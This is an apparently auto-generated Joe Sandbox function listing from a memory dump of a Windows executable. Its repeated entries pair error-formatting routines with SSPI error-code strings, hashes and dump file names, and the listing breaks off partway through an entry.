Instruction ID: 25a3b4ff6ec97f3ebbbee5cab11ff5d28cf8b9df003f4196d4bbe9698c5f8086
Opcode Fuzzy Hash: 71b5bd0bd2c4ab393c8ec79bf7120c6e552326132cc97a442f3191a6bacb258b
Instruction Fuzzy Hash: 57014F2560D94296F755BF61A0142BCE311AF4CBA1FC50075CE2E077D1CF3C9449A3B8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1315A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_UNSUPPORTED_FUNCTION, xrefs: 00007FF7F8D1315A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_UNSUPPORTED_FUNCTION
API String ID: 2544740495-3154753693
Opcode ID: f695e7b5798694bafefd2624ce01e6bfa24dc276d829e8f6caec7b07cd320753
Instruction ID: e4af88f6b82697010f6321423e8281280dec2ebceb24c6cbc9906e657dce0c54
Opcode Fuzzy Hash: f695e7b5798694bafefd2624ce01e6bfa24dc276d829e8f6caec7b07cd320753
Instruction Fuzzy Hash: 59012C25A0D94296F755BB61A0142BCE311AF4CBA1FC50075CA2E027D1CF3C9449A6A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D13166 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_UNSUPPORTED_PREAUTH, xrefs: 00007FF7F8D13166

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_UNSUPPORTED_PREAUTH
API String ID: 2544740495-3293119623
Opcode ID: 07bbe96144a09a96b1eb56c05cf1bed29e3bbd84e64be6ab265ccf252e0b96ff
Instruction ID: 9082a13789ca6b7278e624ff0763ce119d789366688556ef905a49e12d683293
Opcode Fuzzy Hash: 07bbe96144a09a96b1eb56c05cf1bed29e3bbd84e64be6ab265ccf252e0b96ff
Instruction Fuzzy Hash: BC012C2560D94296F755BB61A0142BCE311AF4CBA1FC50075CA2E027D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D13172 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_UNTRUSTED_ROOT, xrefs: 00007FF7F8D13172

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_UNTRUSTED_ROOT
API String ID: 2544740495-1393992520
Opcode ID: 973212ccd0867228b92a0ba13a3e1da5f0c8bf4ecced34b26a802e2d60853c05
Instruction ID: d12a6ad383ddf37975bd8c54b14ab5e8d832f8ea3f2519690b5b29ec8ba3cc20
Opcode Fuzzy Hash: 973212ccd0867228b92a0ba13a3e1da5f0c8bf4ecced34b26a802e2d60853c05
Instruction Fuzzy Hash: 58012C2560D94296F755BB61A0142BCE311AF4CBA1FC50075CA2E027D1CF3CA449A2B8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D13142 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_UNFINISHED_CONTEXT_DELETED, xrefs: 00007FF7F8D13142

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_UNFINISHED_CONTEXT_DELETED
API String ID: 2544740495-3072354809
Opcode ID: 4d68d1d01c927f77f1b2e0b141170b6e7c82e59eb3f583db455e42859803b420
Instruction ID: 1d700d660d1a114eead6757257d2f7e0d262fd402740910abed71888724ca29b
Opcode Fuzzy Hash: 4d68d1d01c927f77f1b2e0b141170b6e7c82e59eb3f583db455e42859803b420
Instruction Fuzzy Hash: 37012C2560D94296F755BB61A0142BCE311AF4CBA1FC50075CA2E027D1CF3CA449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1314E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_UNKNOWN_CREDENTIALS, xrefs: 00007FF7F8D1314E

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_UNKNOWN_CREDENTIALS
API String ID: 2544740495-23602836
Opcode ID: d4f2dc6d101ccb2df0d0913de69ed71cfad314068b2ea64795196b912f46502e
Instruction ID: 0c0e999e8630e0e8b432b3ec0320baa4d457d10d8a767cadc0c256da7d303900
Opcode Fuzzy Hash: d4f2dc6d101ccb2df0d0913de69ed71cfad314068b2ea64795196b912f46502e
Instruction Fuzzy Hash: 91012C2560D9429AF755BB61A0142BCE311AF4CBA1FC50075CA2E027D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1311E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_TARGET_UNKNOWN, xrefs: 00007FF7F8D1311E

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_TARGET_UNKNOWN
API String ID: 2544740495-4056133115
Opcode ID: 08b56b9d40f55a3b8ee249dfe147ca408a5fd830278aa069b37bacf9866c5f53
Instruction ID: 653ab4b823597517da8332d99feda992ee9f2abea878bec332e43b16e0bac80f
Opcode Fuzzy Hash: 08b56b9d40f55a3b8ee249dfe147ca408a5fd830278aa069b37bacf9866c5f53
Instruction Fuzzy Hash: 76012C2560D94296F755BF61A0142BCE311AF4CBA1FC50075CA2E067D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1312A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_TIME_SKEW, xrefs: 00007FF7F8D1312A

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_TIME_SKEW
API String ID: 2544740495-680912890
Opcode ID: 1b9e77e400347b79f99435d99fe8c2f11b4d9b5c35332718bf7d8800c1b63fd9
Instruction ID: 4d3c6fb3a223089bbfdb0dbc24ca66e5f3e5b2d12032cfe8d84844f48a1769ec
Opcode Fuzzy Hash: 1b9e77e400347b79f99435d99fe8c2f11b4d9b5c35332718bf7d8800c1b63fd9
Instruction Fuzzy Hash: BB014F2560D94296F759BF61A0142BCE311AF4CBA1FC50075CE2E037D1CF3C9449A3B8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D13136 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_TOO_MANY_PRINCIPALS, xrefs: 00007FF7F8D13136

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_TOO_MANY_PRINCIPALS
API String ID: 2544740495-588335900
Opcode ID: 9f700a4d3f636f910e0a1d8d048eedc72245f7d623259e447465c646a032101b
Instruction ID: 5bee26ffd4f753badc5047111a2321b503b208c8d2785017ed88c6c58400020f
Opcode Fuzzy Hash: 9f700a4d3f636f910e0a1d8d048eedc72245f7d623259e447465c646a032101b
Instruction Fuzzy Hash: 14012C2560D94296F755BB61A0182BCE311AF4CBA1FC50075CA2E027D1CF3C9449A3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12F02 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_DOWNGRADE_DETECTED, xrefs: 00007FF7F8D12F02

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_DOWNGRADE_DETECTED
API String ID: 2544740495-4027265317
Opcode ID: 06119177f76b92adc406de657f1f5c1e6342a8914643e70863c5da2e8105c10f
Instruction ID: 45ddc3ce65b010c7fd063d5c56b0982374418fc756d4ab559ec0d71e5c15166e
Opcode Fuzzy Hash: 06119177f76b92adc406de657f1f5c1e6342a8914643e70863c5da2e8105c10f
Instruction Fuzzy Hash: 1D01FF2560D94696F759BF61A0142BCE311AF5CBA5FC50075CE2E077D1CF3C9849A3B8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12F0E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_ENCRYPT_FAILURE, xrefs: 00007FF7F8D12F0E

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_ENCRYPT_FAILURE
API String ID: 2544740495-3247260902
Opcode ID: fc7bbb49d88e6a8d5e00264acd789ea11858ce57661fe84bbf87e68b6f815ba5
Instruction ID: 2c809242e23c988f2225d65337ba1e584aae1f1fb6dd887576f25f85ec27e8ad
Opcode Fuzzy Hash: fc7bbb49d88e6a8d5e00264acd789ea11858ce57661fe84bbf87e68b6f815ba5
Instruction Fuzzy Hash: DD014F2560D94296F755BF61A0142BCE311AF4CBA1FC50075CE2E037D1CF3C9849A3B8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12EDE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_DECRYPT_FAILURE, xrefs: 00007FF7F8D12EDE

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_DECRYPT_FAILURE
API String ID: 2544740495-927900899
Opcode ID: 4971c33ed4d89050027657bf57fecd209b12e35fd3d837aeff4a681cca2052ed
Instruction ID: 5ce91643b4580bfc122ccfaeda228db4be547e0d4f0d18d384bc0f3e1c829efc
Opcode Fuzzy Hash: 4971c33ed4d89050027657bf57fecd209b12e35fd3d837aeff4a681cca2052ed
Instruction Fuzzy Hash: D001EC2560D94696F759BF61A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12EEA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_DELEGATION_POLICY, xrefs: 00007FF7F8D12EEA

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_DELEGATION_POLICY
API String ID: 2544740495-517742998
Opcode ID: 884a30123dd02074d5dca50b448c1ca9c70cc957a3e5131ec81daab3b70592f4
Instruction ID: 603c1b233d0e323e5dc73353dcae84aebcfe61d97518ba8d79f939b089538348
Opcode Fuzzy Hash: 884a30123dd02074d5dca50b448c1ca9c70cc957a3e5131ec81daab3b70592f4
Instruction Fuzzy Hash: 59012C2560D94296F755BB61A0142BCE311AF4CBA5FC50075CA2E027D1CF3C9849A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12EF6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_DELEGATION_REQUIRED, xrefs: 00007FF7F8D12EF6

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_DELEGATION_REQUIRED
API String ID: 2544740495-1240544088
Opcode ID: 7d3ddc84a2b611b204b5a948a41059ffd180738bee72042b6ad79dab8588ea97
Instruction ID: 15b161355c8f15015ab2bcc2536c7065d86da9c2f35bdf93cfe378cffc1d4ed6
Opcode Fuzzy Hash: 7d3ddc84a2b611b204b5a948a41059ffd180738bee72042b6ad79dab8588ea97
Instruction Fuzzy Hash: FE01FF2560D94696F755BF61A0142BCE311AF5CBA5FC50075CE2E077D1CF3C9849A3B8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12EBA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D1338A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D13395
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D1339E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F8D133AA

Strings

SEC_E_CONTEXT_EXPIRED, xrefs: 00007FF7F8D12EBA

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_lstrncpy
String ID: SEC_E_CONTEXT_EXPIRED
API String ID: 2544740495-1501973646
Opcode ID: dfc76429ef52e494065cc4d85cb53e6da6e2f7e519051e86ea1df54f7158e112
Instruction ID: 60f00e283bd4e97c497733440658f6654c1af4f8f3b2ec41ede3bf907a571ca7
Opcode Fuzzy Hash: dfc76429ef52e494065cc4d85cb53e6da6e2f7e519051e86ea1df54f7158e112
Instruction Fuzzy Hash: 4501EC2560D94696F755BF71A0142BCE311AF5CBA5FC50075CA2E067D1CF3C9449A2A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12EC6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F8D1336B
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D1337D
